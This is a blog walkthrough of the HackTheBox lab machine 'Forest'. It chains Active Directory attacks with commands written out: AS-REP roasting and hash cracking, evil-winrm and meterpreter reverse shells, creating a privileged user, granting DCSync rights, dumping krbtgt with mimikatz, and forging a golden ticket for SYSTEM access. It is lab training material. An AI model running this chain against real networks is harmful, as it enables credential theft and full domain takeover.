Forest HTB Writeup

Forest 🌲

Recon

A lot of open ports found in this windows box 53,88,135,139,389,445,464,593,636,3268,3269, First I am going to try smb on port 445 using smbmap smbmap -H 10.10.10.161 to see if any of the shares are open, but nothing. At this point I run enum4linux hopefully getting some juicy usernames to try on smbmap. enum4linux -U 10.10.10.161, I get a list of usernames and I write it to a notepad. I try some of the but nothing comes up.So at this point smb does’t do much for me. I try to look into ldap using jxplorer, but nothing there also. Since there is kerberos, I download impacket and look into the examples script. There is a script which allows me to grab tgt of some users which kerberos does not require them preauthentication. I will use this command ./GetNPUsers.py htb.local/ -no-pass -usersfile user.txt, I get a result of the tgt for user svc-alfresco, I crack this using hashcat, and get the password s3rvice.

User

Trying this user with smb does not give me much neither does with any other service on the ports we found. So I scan again using nmap on all ports and find out winrm port open 5985. I use a tool named evil-winrm to get a powershell shell on the box, and grab user.txt.

Root

I upload to the box and import using . .\bloodhound.ps1, 2 powershell scripts, first is bloodhound.ps1 and the other is powerview.ps1.

  1. I am going to run BloodHound.ps1 Invoke-Bloodhound -CollectionMethod All -LdapPort 389 -LdaPpass s3rvice, this would create a zip file which I copy to my local box, and after that I import it to bloodhound application to view a path to Domain admin.

screen

I generate an exe file using msfvenom and upload it into the box using impacket-smbserver. I execute the file and get a meterpreter shell on my host. I create a new user using net user fuxsocy passwordhere! /add and then add him to account operators group and exchange windows permission and remote managemenet by typing net GroupNAMEHERE group_name fuxsocy /add.

  1. Now I log out from evil-winrm and login as the new created user. I upload get again a meterpreter reverse shell, and now since I am member of EXCHANGE WINDOWS PERMISSIONS i have permision to modifyd DACL(Discretionary Access Control List) which will grant me access to an object. I open powershell from meterpreter by opening shell and then powershell.exe I import . .\powerview.ps1 I type Add-DomainObjectAcl -TargetIdentity htb.local -Rights DCSync. If no erros shows then I am good to go. I upload mimkatz on the box, and run it using .\mimikatz.exe. Then I type lsa::dsync /user:krbtgt and grab the output from it.

Since I have the tgt of that krbtgt user I can use ticketer.py from impacket to create a golden ticket. python ticketer.py -nthash 819af826bb148e603acb0f33d17632f8 -domain-sid S-1-5-21-3072663084-364016917-1341370565 -domain HTB.local administrator and then set the filename to a variable named KRB5CCNAME using export KRB5CCNAME=administrator.ccache, now I have golden ticket which I can use with psexec to execute commands on the box as administator. I use psexec.py -k -n htb.local/administrator@forest.htb.local cmd.exe Which will pop a shell as nt authority\system.


Forest HTB Writeup
http://3rg1s.com/2020/03/21/2020-03-21-Forest/
Posted on
March 21, 2020
Licensed under